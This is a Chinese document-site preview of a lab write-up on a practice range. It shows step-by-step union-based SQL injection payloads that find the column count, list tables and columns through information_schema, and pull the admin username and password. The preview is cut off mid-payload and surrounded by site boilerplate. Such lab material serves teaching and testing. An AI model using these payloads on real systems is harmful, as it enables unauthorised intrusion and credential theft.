已阅读5页,还剩4页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
靶场位置:/?a=battle&f=target&id=485e58d0afa7e4f7第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常继续构造 ?id=1 and 1=1 order by 2 回车页面正常继续构造 ?id=1 and 1=1 order by 3 回车页面异常,因此判断当前页面所使用的的数据表里有2个字段第三步:判断回显点因为判断字段数为2,所以构造 ?id=1 and 1=2 union select 1,2 回车页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容。第四步:查询相关内容查询当前数据库名构造 ?id=1 and 1=2 union select 1,database() 回车查询当前数据库版本构造 ?id=1 and 1=2 union select 1,version() 回车查询当前数据库有哪些表构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车P.S:可通过修改红色处的数字来查询其他的表名,比如limit 1,1。这里我们想拿到的是目标的管理员账号密码,一般在admin表里,所以没有继续测试。查询admin表里有哪些字段构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=admin limit 0,1P.S:可通过修改红色处的数字来查询其他的字段名。查询到admin表里有三个字段,id ,username和password查询这些字段的内容构造?id=1 and 1=2 union select 1,username from admin limit 0,1 P.S:可通过修改红色处的数字来查询其他的内容。构造?id=1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025年博物馆旅游行业当前发展趋势与投资机遇洞察报告
- 2025年预应力钢筒混凝土管(PCCP)行业当前发展现状及增长策略研究报告
- 2025年房地产行业当前发展趋势与投资机遇洞察报告
- 支架植入相关知识及护理课件
- 2025年中国古代文学常识知识竞赛试题库及答案
- 2025年保密知识试题库附参考答案
- 2025年职业技术《电脑印刷设计》技能专业知识考试题与答案
- 2025年施工员之装修施工基础知识考试题库含答案ab卷
- 2025年护理三基模拟测试题含参考答案
- 2025年社会工作者之初级社会工作实务通关提分题库及完整答案
- 小海豚加油站加盟合同范本
- 初中物理实验教案汇编
- 浙江省消防技术规范难点问题操作技术指南(2020版)
- 武理工水处理生物学课件第11章 污水生物处理系统中的微生物
- 临床实验中不良事件的管理
- 如何开展课题研究
- 英语选修4单词表
- 炼钢厂电工应知应会考试题库500题(含各题型)
- GB/T 3840-1991制定地方大气污染物排放标准的技术方法
- 旅游区奖惩制度管理办法
- 小学语文人教六年级上册《童年》整书阅读课件
评论
0/150
提交评论